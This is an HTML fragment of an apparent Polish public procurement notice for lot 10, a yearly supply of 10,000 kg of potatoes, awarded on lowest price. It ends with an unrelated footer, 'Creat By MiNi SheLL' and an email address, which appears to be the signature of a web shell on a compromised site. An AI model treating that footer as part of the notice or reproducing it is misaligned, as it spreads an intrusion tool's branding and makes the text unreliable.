<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
zamówienia
w dostawie
rocznej:
ZIEMNIAKI	kg	10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com